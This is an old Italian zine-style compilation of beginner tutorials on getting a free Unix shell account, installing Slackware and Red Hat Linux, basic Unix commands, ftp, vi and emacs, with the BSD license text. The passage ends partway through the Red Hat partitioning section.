³³³³³³³³³³³³³³³³³³³³³³³³³³#³³³³³#³##³³#³³#³³#³³³#³³³³³³³³³³³³³³³³³³³³³³³³³³
³³³³³³³³³³³³³³³³³³³³³³³³³³#³³³³³#³#³#³#³³#³³#³³³#³³³³³³³³³³³³³³³³³³³³³³³³³³
³³³³³³³³³³³³³³³³³³³³³³³³³³#³³³³³#³#³³##³³#³³#³³³#³³³³³³³³³³³³³³³³³³³³³³³³³³
³³³³³³³³³³³³³³³³³³³³³³³³³³####³³#³#³³³#³³####³³#³#³³³³³³³³³³³³³³³³³³³³³³³³³
³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


|¤³>################################################################<³¤|
|¤³<#########################Come iniziare##########################<³¤|
|¤³>################################################################<³¤|


Autore: Buddamonk
Titolo: Unix, come iniziare





* * * * * * *
* * ** * * * Come iniziare!
* * * ** * *
** * * * * *



Quante volte (perchè no, spesso su irc) hai sentito parlare di Unix
e ti sei detto "mo me lo skariko così anche io posso vantarmene hiih"
ed invece eccoti ancora con il tuo bel Winzzozzo 95/98/2000/me.........



C'è sempre tempo per cominciare......ti dico io...

E tu mi risponderai, bravo!!!! Hai scoperto l' acqua calda...
come devo fare io non sono capace e poi devo formattare e poi dove lo trovo io Unix e quanto
tiene e come si usa ***Calmati leggi è saprai come fare :PP

Dunque la miglior cosa per iniziare ad usare un sistema Unix è la shell,
per usare la shell basta avere un qualsiasi OS (persino M$-Dos).
Una shell non è altro che una connessione tramite il tuo pc ad un pc più potente che usa come
sistema operativo Unix.
Per accedere ad una shell devi superare un Login, cioè devi identificarti
con un Username e una Password.
La maggior parte delle shell sono a pagamento ma ve ne sono altre che sono free.
Le free hanno delle limitazioni (non si possono eseguire processi in background, etc).
Per fartene una o sborsi dei soldi, o TE LA PRENDI(:P H4ck4 rul3z) o opti per una free.
Con una shell free puoi usare tutti i comandi di un sistema basato su Unix, quindi impararli
per quando userai un sistema tuo.

Per farti delle shell free un buon punto di partenza è
+ http://www.info.tampere.fi/~llyeerle/unixshell.html

Oppure in data odierna puoi telnettarti a

+ sdf.lonestar.org
+ blekko.net
+ unix-shells.com


Il telnet non è altro che una finestra terminale che ti permette di connetterti ad host remoti.
Se non uni Windows (Quello è talmente semplice che se non lo sai usare puoi anche smettere di
leggere :P) segui questo esempio...

$ telnet

telnet> op
[to]unix-shells.com

Connected to Unix-shells.com

Login: newuser
...qui ti fara delle domande a cui devi rispondere poi avrai un accesso ...

quindi fai tutto e...buona fortuna.


Written by Buddamonk
With vi on OpenBSD v2.7 system
http://www.ciaoweb.net/dankooo/index.html
mail: monk84@libero.it


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


|¤³>################################################################<³¤|
|¤³<##################Installazione Linux Slackware#################<³¤|
|¤³>################################################################<³¤|


Hmm dovrei installare Linux, ma devo formattare e poi
non so se ci riesco, cosa vuol dire /dev/hda1 ???
AIUTOOOOOOO


Quante volte ho sentito dei lamenti simili da miei amici
utenti Windows (i quali dopo che gli ho stressati per cambiare OS si sono convinti ma con tutta la buona volontà non ci sono riusciti)ma ora Basta!!!!
Spiego qui una volta per tutte come fare :PPP!!!!!


Dunque, sò benissimo che al giorno d' oggi esistono delle distribuzioni (Caldera, Corel, Rh, EasyLinux, Mandrake etc..) che hanno tutta l' installazione grafica con relativo riconoscimento dell' hardware in automatico ma per esperienza personale vi posso dire che hanno molti difetti.
In primix i buchi (es. RH 7.0 olre 300 buchi) oppure spesso il riconoscimento dell' hardware avviene in maniera parziale o errata.
Questo articolo tratta dell' installazione della Slackware che rimane comunque la più difficile e bella :P!

1)Devo formattare???

Bhe dipende, se si vuole una stabilità enorme (Gestione server ftp, http etc) conviene dare una formattatina al disco altrimenti basterà usare un tool per partizionare
semplicemente.
A mio avviso il migliore è fips che ricava dello spazio da un disco ma essendo in modalità solo testo non è intuitivo.
Qunidi vi consiglio se non siete già abbastanza avanzati di usare Pmagic dell powerquest (ehi, se non riuscite a usare manco questo allora imparate come accendere/spegnere un pc!!!).

Se il Vs. pc supporta il boot da cd-rom basta inserire il cd altrimenti bisognerà fare i dicski di boot...come fate???....Seguite le mie direttive!!!!

2)Come creare i discki di boot....
Creare dei dischi di boot è più semplice di quanto di possa pensare.
Per il Dos è stata scritta un' utility chiamata rawrite.
Spostandoci nella dir contenente i file di boot (es bare.i) absterà scrivere rawrite che avviandosi chiederà il nome del faile di immagine e successivamente il device in cui scriverlo (come nome scriveremo bare.i e device A:).
Finalmente potremo riavviare il Ns. pc con il disco dentro e ci troveremo in una shell Linux...o mamma mia cosa fare...
Bhe ora bisognerà creare le partizioni se non lo abbiamo ancora fatto.
Creeremo una partizione primaria (root) e una per la memoria virtuale(swap).
Fatto cio semplicemente digitando "setup" avvieremo il
"semplice" tool di configurazione slacware.
Il tool non farà altro che chiederci (oltre alla classica password di root che inventeremo noi e non dovremo mai dimenticare) che pacchetti installare.
Io consiglierei di installare tutto inizialmente per poi disinstallare le cose che non utilizzeremo.
Riavviamo il pc (per essere sicuri che tutto sia ok e che non spuntino strani mostri a sei zampe come quelli degli incubi che avevate avuto prima di leggere qui :PP)
ci colleghiamo al sistema con la password di root e finalmente tutto e andato per il meglio.

Per entrare in x scriviamo startx o runx e per tornare alla modalità console init3.

Cosa ce ne faccimo di tutto ciò????

Questo ad un altro articolo!!!!!!

Byez by buddamonk

monk84@sdf.lonestar.org
monk84@libero.it

Join #Busalla

Byez


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

|¤³>################################################################<³¤|
|¤³<####################Un primo passo verso Unix###################<³¤|
|¤³>################################################################<³¤|


Autore: Buddamonk
Titolo: Un primo passo verso Unix



* * * * * * *
* * ** * * * Un primo passo verso Unix
* * * ** * *
** * * * * *



**********************************Contenuti********************************


1) Semplici comandi Unix
1.1) Gestione directory
1.2) Gestione dei file
2) Come usare ftp
3) Comandi vi
4) Comandi emacs
5) Licenza BSD

1) SEMPLICI COMANDI UNIX

1.1) Gestione directory

$ basename

basename pathname [suffisso]

Estrae il nome di un file da un pathname, cioè da un nome contenente l'informazione del percorso e del file. In pratica: rimuove da pathname la parte anteriore contenente l'informazione sul directory ed eventualmente, il suffisso indicato, dalla parte finale del nome rimanente. Il risultato viene visualizzato nello standard output.

$ dirname

dirname pathname

Estrae il nome del directory da un pathname, cioè da un nome contenente l'informazione del percorso e del file. In pratica: rimuove da pathname la parte finale a partire dall'ultimo / di divisione tra l'informazione del directory e il nome del file. Se il pathname contiene solo un nome di file, il risultato è ., cioè il directory corrente. Il risultato viene emesso nello standard output.

$ ls

ls [opzioni] [nome ...]

Visualizza i nomi di file o il contenuto dei directory indicati. In mancanza di questa indicazione, viene visualizzato il contenuto del directory corrente. Di norma non vengono visualizzati i nomi di file e di directory il cui nome inizia con un punto: questi sono considerati nascosti.

Alcune opzioni



-a | --all

Vengono elencati anche gli elementi i cui nomi iniziano con punto.


-A | --almost-all

Vengono elencati tutti gli elementi, esclusi . e ...


-l | --format=long | --format=verbose

Oltre ai nomi, vengono visualizzati il tipo, i permessi, il numero di hard link, il nome del proprietario, il nome del gruppo, la dimensione in byte, la data di modifica.


-q | --hide-control-chars

Utilizza il punto interrogativo per sostituire i caratteri non stampabili eventualmente contenuti nei nomi.


-R | --recursive

Vengono elencati i contenuti di tutti i directory in modo ricorsivo.


$ mkdir

mkdir [opzioni] dir ...

Crea uno o più directory. In mancanza di indicazioni, gli attributi del nuovo directory sono drwxr-xr-x in modo da permettere l'accesso e la lettura a chiunque.

$ pathchk

pathchk [opzioni] file ...

Verifica il percorso. Per ogni file richiesto, vengono controllate alcune condizioni inerenti il percorso tra cui in particolare la possibilità di raggiungerli in funzione dei permessi di esecuizione sui directory.

$ pwd

pwd

Visualizza il directory corrente.

$ rmdir

rmdir [opzioni] dir ...

Elimina i directory indicati se vuoti.

Opzioni

-p

Elimina anche i directory precedenti, espressamente indicati nell'argomento, se dopo la cancellazione dei directory finali, questi restano vuoti.


1.2) Gestione dei file

$ chgrp

chgrp [opzioni] gruppo file ...

Cambia la proprietà dei file rispetto al gruppo. Il gruppo, nell'argomento del comando, può essere espresso con il nome o con il numero GID. È equivalente a chown ( chown) quando non si specifica l'utente.

Parametri passabili:
-R Esegue l'operazione anche nei subdirectory.

$ chmod

chmod [opzioni] modo file ...

Cambia i permessi sui file indicati come argomento. Le modifiche dei permessi avvengono in base alle specifiche indicate nell'argomento precedente all'elenco dei file e si possono esprimere con la sintassi seguente:

[ugoa...[[+-=][rwxXstugo...]...][,...]

Una combinazione delle lettere ugoa controlla il tipo di utenti a cui si vuole riferire il cambiamento di permesso, i segni +-= indicano il tipo di cambiamento sui permessi, il gruppo finale di lettere rwxXstugo indica i permessi su cui agire.


$ chown

chown [opzioni] [utente][:.][gruppo] file...

Cambia la proprietà dei file. Se viene fornito solo il nome dell'utente o il suo numero UID, questo diviene il nuovo proprietario dei file. Se il nome dell'utente, o il suo numero, è seguito da : oppure da . e dal nome, o dal numero (GID) di un gruppo, vengono cambiate le proprietà dell'utente e del gruppo. Se dopo : o . non segue il nome del gruppo, viene attribuito il gruppo a cui appartiene l'utente. Se prima di : o . non viene indicato il nome dell'utente, viene cambiata solo la proprietà del gruppo.

NB. : disponibile anche il recoursive con -R


$ file

file [opzioni] file ...

Determina il tipo di file. Il comando analizza i file indicati come argomento e cerca di classificarli utilizzando il seguente orgine di analisi: filesystem, numero magico, linguaggio. Il comando visualizza una definizione verbale per i file analizzati e in generale, le parole text, executable e data hanno il seguente significato.



Possibili risultati: text Il file contiene solo caratteri ASCII.
executable Il file è un programma eseguibile.
data Il file non è un programma e non è un file ASCII.



$ touch

touch [opzioni] file...

Cambia la data di accesso e di aggiornamento dei file. Se non viene specificata una data, viene utilizzata la data e l'ora ottenuta dall'orologio del sistema nel momento in cui viene eseguito il comando. Se vengono specificati file che non esistono, questi vengono creati vuoti.


$ cp

cp [opzioni] origine ... destinazione

Copia i file. Se vengono specificati solo i nomi di due file, il primo viene copiato sul secondo; viene cioè generata una copia che ha il nome indicato come destinazione. Se il secondo nome indicato è un directory, il file viene copiato con lo stesso nome nel directory. Se vengono indicati più file, l'ultimo nome deve essere un directory e verranno generate le copie di tutti i file indicati nel directory di destinazione. In mancanza di altre indicazioni, i directory non vengono copiati.



$ ln

ln [opzioni] origine destinazione

ln [opzioni] origine ... directory

Crea un collegamento (link) tra file e/o directory. Se viene specificata una origine e una destinazione, il nome indicato come destinazione sarà il nuovo link che punta al nome indicato come origine (e può trattarsi anche di un directory). Se vengono specificati più nomi nell'origine, l'ultimo argomento deve essere un directory e si intende che all'interno del directory di destinazione verranno creati tanti link quanti sono i nomi indicati come origine. Se non viene specificato diversamente attraverso le opzioni, vengono creati degli hard link e non dei link simbolici.


$ mv

mv [opzioni] origine ... destinazione

Sposta i file e/o i directory. Se vengono specificati solo i nomi di due elementi (file o directory), il primo viene spostato e/o rinominato in modo da ottenere quanto indicato come destinazione. Se vengono indicati più elementi (file o directory), l'ultimo attributo deve essere un directory: verranno spostati tutti gli elementi elencati nel directory di destinazione. Nel caso di spostamenti attraverso diversi filesystem, vengono spostati solo i così detti file regolari (quindi: no link, no directory).


$ rm

rm [opzioni] nome ...

Rimuove i file indicati come argomento. In mancanza dell'indicazione delle opzioni necessarie, non vengono rimossi i directory.


$ head

head [opzioni] [file ...]

Emette nello standard output la prima parte (le prime 10 righe se non viene specificato diversamente nelle opzioni) dei file forniti come argomento. In alternativa viene utilizzato lo standard input se viene indicato il simbolo - da solo.

$ pr

pr [opzioni] [file ...]

Emette nello standard output il contenuto dei file forniti come argomento o in alternativa il contenuto dello standard input se viene utilizzato il simbolo - da solo, formattati opportunamente per la stampa.

$ rev

rev [file ...]

Emette nello standard output il file fornito come argomento, oppure lo standard input, rovesciando l'ordine dei caratteri di ogni riga.

$ tail

tail [opzioni] [file ...]

Emette nello standard output la parte finale dei file forniti come argomento o in alternativa il contenuto dello standard input se viene utilizzato il simbolo - da solo.

$ tr

tr [opzioni] stringa1 [stringa2]

Copia lo standard input nello standard output trasformandolo in vari modi possibili. Questo comando può essere utile per sostituire o eliminare determinati caratteri da un testo (compresi alcuni caratteri di controllo), oltre che compattare delle sequenze ripetitive di caratteri.

$ wc

wc [opzioni] [file ...]

Emette sullo standard output la statistica sul conteggio delle parole e altro dei file forniti come argomento (o dello standard input se viene utilizzato il simbolo - da solo).


$ cat

cat [opzioni] [file ...]

Concatena dei file e ne emette il contenuto nello standard output. Il comando emette di seguito i file indicati come argomento sullo standard output (sullo schermo), in pratica qualcosa di simile al comando type del ``DOS''. Se non viene fornito il nome di alcun file, viene utilizzato lo standard input.



$ tee

tee [opzioni] [file ...]

Copia lo standard input nello standard output e anche nei file indicati come argomento. Si tratta quindi di un filtro che permette di copiare i dati in transito in un file.

2) COME USARE FTP

Per aprire una shell ftp digitare ftp al prompt di shell.
FTP (file transfer protocol) è un protocollo di trasferimento file (basato sulla porta 21) con il quale si può:

Downloadare file da intenet
Uploadare siti
Upload / Download sulla proria shell di file
Molte altre cose...
Una volta digitato FTP al prompt della shell apparirà un secondo prompt così:

ftp>

quindi

$ftp

ftp>

A quasto punto il programma aspetta che immettiamo dei comandi il primo che impartiremo sarà op.
Ci verra risposto con un [to] nel quale metteremo l' host di connessione.
Dopo delle scritte con le quali il server ci comunica le nostre operazioni
ci verrà chiesta una Login.
Se abbiamo un account dedicato sul server potremo usare quello altrimenti dovremo usare accesso anonimo (User: anonymous Pass: tuaemail@tuaemail.it o qualsiasicosa@quelloche vuoi).
Quindi mettiamo caso che ci si debba collegare all' host ftp.gmd.de (o all' host 212.12.132.27) digiteremo

ftp>op
[to] ftp.gmd.de (oppure equivalente ip)

220-Connecting to ftp.gmd.de
etc
etc
User: anonymous
Pass: ******** (qui si può scrivere qualsiasi cosa con un @ in mezzo!!!)

anonymous logged in.

ftp>

Ora che siamo entrati possiamo incominciare a fare qualcosa.
Come prima cosa settiamo il modo di trasferire su bin
con il comando bin

ftp> bin
bin set to I

poi possiamo uploadare con mput nomefile
e donwloadare con mget nomefile

possiamo ottenere la lista dei files con ls
cambiare directory con cd e sapare dove siamo con pwd.
Se ci servisse la shell basta digitare !

ftp>!
$exit
ftp>

Per ora basta così....Buon divertimnto!!!!!!!

3) COMANDI VI
Per creare un nuovo filecon vi basta digitare vi nomefile. Ecco alcuni utili tasti in modo commando:

i ...vai in modo inserimento (ESC per ritornare al modo commando)
:q! .esci da vi senza salvare le modifiche
:x ..esce salvando le modifiche
dd ..cancella una linea
A ...aggiungi alla fine della riga corrente

(I due punti si ottengono con esc!)
Nota che in modo commando si usano i tasti freccia per muovere il cursore. Per ulteriori informazioni, come al solito, man vi.

4) COMANDI EMACS

EMACS E' l' editor scritto da Richard Stallman, grande, grosso e potente. Una volta che lo avete fatto avviare tenete presente le seguenti tre combinazioni di tasti:

Ctrl-h, Ctrl-t per un tutorial che vi spiega le basi di Emacs.
Ctrl-h, Ctrl-i per la guida completa.
Ctrl-x, Ctrl-c per uscire da Emacs.

Notate che esiste anche la xemacs, che gira sotto X e non eguaglierà mai emacs da shell :PP

5) LICENZA BSD

Riporto la licenza per intero in lingua originale:

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.

2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.

3. All advertising materials mentioning features or use of this software must display the following acknowledgement: This product includes software developed by the author and its contributors.

4. Neither the name of the author nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.


Written by Buddamonk
Web master of http://www.ciaoweb.net/dankooo/index.html
e-mail: monk84@libero.it



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------------------------------------------------------------------------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


|¤³>################################################################<³¤|
|¤³<######################Guida a Linux Red Hat#####################<³¤|
|¤³>################################################################<³¤|


APPUNTI/GUIDA A LINUX RED HAT

N.D. Cookbooker: Eccovi una spece di Bibbia sulla distribuzione Red Hat di Linux.

Procurata da Buddamonk (non ho ankora kapito se l'ha fatta lui o l'ha trovata... bo :op)


Parte 1. Installazione di una distribuzione Red Hat o di una sua derivata

La distribuzione GNU/Linux Red Hat dispone di un manuale molto dettagliato sulla procedura di installazione, che affronta tutti gli aspetti di questa operazione. In questa guida vogliamo dare una visione generale di questo procedimento, in modo non troppo dettagliato, tenendo conto che da una versione all'altra, e da una distribuzione derivata all'altra, le cose possono essere un po' differenti.

Ci sono distribuzioni che "derivano" dalla Red Hat in quanto utilizzano il formato RPM, Red Hat Package Manager, per gli archivi dei loro pacchetti, ma che non condividono la stessa procedura di installazione. Qui si fa riferimento invece a quelle distribuzioni che riutilizzano quasi tutta l'organizzazione della distribuzione Red Hat.

In generale si fa riferimento a un elaboratore che dispone di un lettore CD-ROM di tipo IDE/ATAPI, che viene usato proprio per l'installazione da CD.



Parte 2 Organizzazione



Con le distribuzioni derivate direttamente da Red Hat si devono preparare uno o due dischetti per avviare il sistema la prima volta quando si vuole installare GNU/Linux nel disco fisso. I dischetti si preparano a partire dai file-immagine.

Il file-immagine da cui si parte è boot.img, collocato normalmente nella directory images/. Quando si installa a partire da una copia della distribuzione su CD-ROM, e si dispone di un lettore IDE/ATAPI, basta solo questo dischetto.

Il programma di installazione delle

  
distribuzioni derivate direttamente dalla Red Hat utilizza una sorta di interfaccia grafica basata su una matrice di caratteri. In questo senso, il programma mostra informazioni e richieste utilizzando degli elementi tipici degli ambienti grafici, che devono essere gestiti dall'utente attraverso la tastiera. Nello stesso tempo, sono disponibili diverse console virtuali, organizzate in modo da facilitare il compito di chi installa questa distribuzione.

Con questo programma, appare generalmente un cursore, o una zona evidenziata, che rappresenta un'opzione attiva o semplicemente la posizione corrente a cui possono fare riferimento i comandi della tastiera. Si possono utilizzare i comandi seguenti per la navigazione e la selezione:

-i tasti freccia spostano il cursore nella direzione della freccia;

-il tasto [Tab], e la combinazione [Alt+Tab], permettono di passare da un elemento all'altro (rispettivamente in avanti e indietro);

-per selezionare un pulsante grafico occorre posizionare il cursore sul tasto stesso e quindi premere la [barra spaziatrice], oppure [Invio];

-per selezionare una voce da una lista, occorre posizionare il cursore sulla voce desiderata e successivamente si deve premere [Invio];

-per selezionare o deselezionare una casella di selezione (check box), si deve posizionare il cursore sulla casella desiderata e premere la [barra spaziatrice].

In quasi tutti i punti della procedura di installazione è possibile rinunciare a una o più scelte fatte, ritornando sui propri passi. Questa facoltà è abbinata generalmente alla selezione dei pulsanti grafici <Cancel> o <Previous>.

L'installazione avviene utilizzando automaticamente la prima console virtuale, e se tutto procede normalmente non c'è alcun bisogno di utilizzare le altre. Tuttavia, quando succedono imprevisti, specialmente quando si vuole eseguire un'installazione che va al di fuori dei canoni tradizionali, le informazioni su ciò che avviene possono essere di grande aiuto. La tabella elenca l'uso che viene fatto delle console virtuali da parte del sistema di installazione della distribuzione Red Hat.

Console Combinazione tasti Descrizione 1 [Alt+F1] Interazione con il programma grafico di installazione. 2 [Alt+F2] Una shell di emergenza. 3 [Alt+F3] Messaggi diagnostici del programma di installazione. 4 [Alt+F4] Messaggi diagnostici di sistema. 5 [Alt+F5] Altri tipi di messaggi diagnostici.


Parte 3. Console virtuali utilizzate dal sistema di installazione.

È il caso di sottolineare che la seconda console virtuale, quella che mette a disposizione una shell di emergenza, potrebbe non essere disponibile immediatamente.

Il kernel utilizzato nei dischetti di avvio per l'installazione della distribuzione è di tipo modulare. Di conseguenza, si possono incontrare difficoltà quando si dispone di hardware non comune. In questi casi, durante la fase di installazione, occorre indicare le caratteristiche di questo hardware, se il sistema non è già in grado di riconoscerlo. In pratica, si utilizzano una serie di moduli per il kernel che vengono attivati solo quando si presenta la necessità. L'attivazione dei moduli può creare qualche problema di fronte a dispositivi che non vengono riconosciuti automaticamente. In tal caso occorre dare qualche indicazione attraverso dei parametri.

La primissima fase dell'installazione è quella più delicata: serve a raggiungere i file della distribuzione da installare. Solo quando si supera questo passaggio è disponibile la shell nella seconda console virtuale.


Parte 4 Prima fase dell'installazione

Come si è già accennato all'inizio della guida, si vuole mostrare come procede l'installazione nella situazione più semplice che si possa presentare: un elaboratore i386 con disco fisso IDE/EIDE e un lettore CD-ROM IDE/ATAPI. Vengono escluse volutamente le possibilità di avviare l'installazione a partire dal sistema operativo Dos o attraverso l'avvio del CD-ROM stesso (per quanto queste siano comunque possibili); inoltre non viene affrontato il problema delle interfacce PCMCIA.


Welcome!

o To install or upgrade a system, press the <ENTER> key.

o To enable the expert mode, type expert <ENTER>. Press <F3> for
more information about expert mode.

o This disk can no longer be used as a rescue disk. Press <F4> for
information on the new rescue disk.

o Use the function key listed below for help with all topics.

[F1-Main] [F2-General] [F3-Expert] [F4-Rescue] [F5-Kickstart] [F6-Kernel]
boot:


Figura 1. L'avvio dell'installazione.

Si inizia avviando il sistema con il dischetto di avvio (quello ottenuto dal file images/boot.img). Sono disponibili diverse possibilità per l'installazione e si possono leggere alcuni file di guida premendo i tasti [F1], [F2], ecc. In situazioni normali basta premere [Invio] per iniziare.



Parte 5 Linguaggio

La prima richiesta che viene fatta è di decidere il linguaggio utilizzato dal programma di installazione. Non ha niente a che vedere con il risultato finale dell'installazione. Benché la traduzione in italiano sia ragionevolmente buona, qui si mostra l'installazione in inglese.

Si seleziona il linguaggio spostando il cursore sull'elenco, attraverso l'uso dei tasti freccia. Una volta evidenziato il nome del linguaggio desiderato, basta confermare premendo la [barra spaziatrice] o [Invio].


.--------| Choose a Language |---------.
| |
| What language should be used during |
| the installation process? |
| |
| English |
| Czech |
| Danish |
| Finnish |
| French |
| German |
| Italian |
| Norwegian |
| |
| .----. |
| | Ok | |
| `----' |
| |
`--------------------------------------'



Parte 6. La scelta del linguaggio durante l'installazione.


Parte 6.1 Mappa della tastiera


È importante disporre di una tastiera configurata correttamente già in fase di installazione. Per questo, viene richiesta subito la sua selezione. Si possono usare i tasti freccia per spostare il cursore lungo l'elenco di tastiere, e così facendo si potrà indicare quella italiana (it). Una volta evidenziata, basta premere [Invio], corrispondente alla selezione del pulsante grafico <Ok>.


Parte 6.2. La scelta della mappa della tastiera.

La selezione della tastiera farà in modo che, da quel momento in poi, la tastiera risulti configurata secondo la mappa scelta, e questa impostazione verrà mantenuta anche nell'installazione finale di GNU/Linux.


Parte 6.3 Scelta dell'origine della distribuzione

Come è stato spiegato, si vuole mostrare l'installazione a partire da una copia su CD-ROM, a cui si accede attraverso un lettore IDE/ATAPI. In queste condizioni, il programma di installazione non ha bisogno d'altro, altrimenti, se si tratta di un'unità con scheda proprietaria, o SCSI, occorre dare al programma delle indicazioni aggiuntive, in modo che possa caricare opportunamente il modulo del kernel che risulta necessario.


.----| Installation Method |----.
| |
| What type of media contains |
| the packages to be installed? |
| |
| Local CDROM |
| Hard drive |
| |
| .----. .------. |
| | Ok | | Back | |
| `----' `------' |
| |
`-------------------------------'

Figura 2 La scelta della fonte dell'installazione. L'elenco dipende dal tipo di dischetto di avvio utilizzato.

Per selezionare un'installazione da CD-ROM locale, basta che la voce corrispondente, Local CDROM, sia evidenziata prima di premere [Invio].


Parte 6.4 Installazione o aggiornamento

Una volta definita l'origine dell'installazione, ammesso che sia andato tutto bene, è il momento di specificare cosa si vuole fare: aggiornare una vecchia versione o installare da zero. Quindi, se si dispone di unità SCSI, è il momento di dichiararlo (se il programma di installazione non è già in grado di riconoscerle da solo).

Si può installare GNU/Linux da zero oppure si può scegliere di aggiornare una versione precedente della stessa distribuzione.

È però da sottolineare che non ci si possono attendere aggiornamenti intelligenti che siano in grado di recuperare e riadattare la configurazione precedente. Di sicuro, i vecchi file di configurazione vengono salvati rinominandoli, in modo che terminino con l'estensione .rpmorig, ma questo significa che poi si deve provvedere a adeguare i nuovi file di configurazione alle vecchie esigenze.

Bisogna tenere in considerazione la possibilità che l'aggiornamento fallisca. Se si intende procedere veramente a un aggiornamento, è praticamente indispensabile fare prima delle copie di sicurezza di tutto il sistema.


Parte 6.5 Classi di installazione

In aiuto agli utenti inesperti, e a chi non ha tempo, potrebbe essere disponibile la selezione tra diversi tipi di installazione. La distribuzione Red Hat distingue in particolare tra: Workstation, Server e Custom. Come si può intuire, la classe Custom permette di definire in modo dettagliato come si vuole installare GNU/Linux, ed è anche ciò che viene mostrato nelle prossime sezioni. Tuttavia, è importante tenere da conto anche le altre due possibilità che possono facilitare molto il lavoro.



-Workstation



Scegliendo questa classe, vengono cancellate tutte le partizioni Linux che il programma di installazione è in grado di trovare nei dischi installati, e viene utilizzato tutto lo spazio che non è occupato da altre partizioni. È il programma di installazione a decidere come organizzare le partizioni.

-Server



Scegliendo questa classe, vengono cancellate tutte le partizioni dei dischi esistenti. Come nel caso della classe Workstation, è il programma di installazione a decidere come organizzare le partizioni. In questo caso, tuttavia, si tende a scomporre lo spazio disponibile in un numero maggiore di partizioni, per motivi di efficienza.





.-----| Installation Class |-----.
| |
| What type of machine are you |
| installing? For maximum |
| flexibility, choose "Custom". |
| |
| Workstation |
| Server |
| Custom |
| |
| .----. .------. |
| | Ok | | Back | |
| `----' `------' |
| |
`--------------------------------'




Figura 3. La scelta della "classe" di installazione.



Parte 6.6 Definizione del file system e della memoria virtuale

La definizione del file system per l'installazione che si sta facendo è una fase un po' delicata, in quanto può tradursi in un intreccio di partizioni connesse in diversi punti di innesto. In questi esempi si mostra l'installazione più semplice per il principiante: quella che utilizza una sola partizione, anche se non si tratta della soluzione ottima per tutte le situazioni.

Il programma di installazione chiede ora all'utente di scegliere lo strumento preferito per la modifica delle partizioni.

Per prima cosa, il programma di installazione permette di scegliere tra due programmi differenti per la modifica delle partizioni: Disk Druid e fdisk. Se si ha la pazienza di leggere almeno una volta come funziona fdisk, questo programma è alla fine il più semplice da usare. Dopo averlo selezionato come programma preferito per questa installazione, viene richiesto di indicare su quale disco intervenire (il disco intero, e non solo una partizione particolare).

Il programma di installazione chiede all'utente di scegliere il disco su cui verrà installato GNU/Linux.

La schermata che avremo di fronte ora se abbiamo a disposizione un solo disco fisso IDE: i pulsanti grafici indicati in basso rappresentano il tipo di azione da compiere: <Done> indica che il lavoro di modifica delle partizioni è terminato su tutti i dischi in cui si voleva intervenire; <Edit> attiva invece fdisk per il disco fisso che risulta evidenziato nell'elenco.

Per proseguire, si deve quindi selezionare il pulsante grafico <Edit>, portandovi sopra il cursore attraverso la pressione di [Tab] (tante volte quanto necessario), e premendo la [barra spaziatrice], o [Invio], alla fine. Quello che si ottiene è quindi l'avvio di fdisk.(2)

Abbiamo fatto riferimento a un disco suddiviso in tre partizioni primarie, nello stesso modo mostrato in quell'esempio di utilizzo di fdisk: hda1 è dedicata al Dos; hda2 viene usata per la memoria virtuale; hda3 è l'unica partizione dedicata al file system per GNU/Linux.

Quando fdisk termina di funzionare, riappare la richiesta vista in precedenza. Se il lavoro di modifica delle partizioni non è finito, si può selezionare nuovamente il pulsante grafico <Edit>, oppure si può indicare un disco differente e ancora selezionare il pulsante grafico <Edit> per modificare le partizioni al suo interno. Quando tutto è terminato, si seleziona il pulsante grafico <Done> e si procede con la definizione dei punti di innesto del file system.



Dopo la preparazione delle partizioni viene richiesta l'indicazione dei vari punti di innesto, dove per prima cosa occorre specificare quale sia la partizione principale, che viene montata nella directory radice. Seguendo gli esempi mostrati sopra non c'è scelta; ci sono a disposizione solo tre partizioni: una Dos-FAT, una per la memoria virtuale e una per GNU/Linux.



.-------------------------| Current Disk Partitions |--------------------------.
| Mount Point Device Requested Actual Type |
| /dos hda1 41M 41M DOS 16-bit >=32M |
| hda2 33M 33M Linux swap |
| / hda3 441M 441M Linux native |
| |
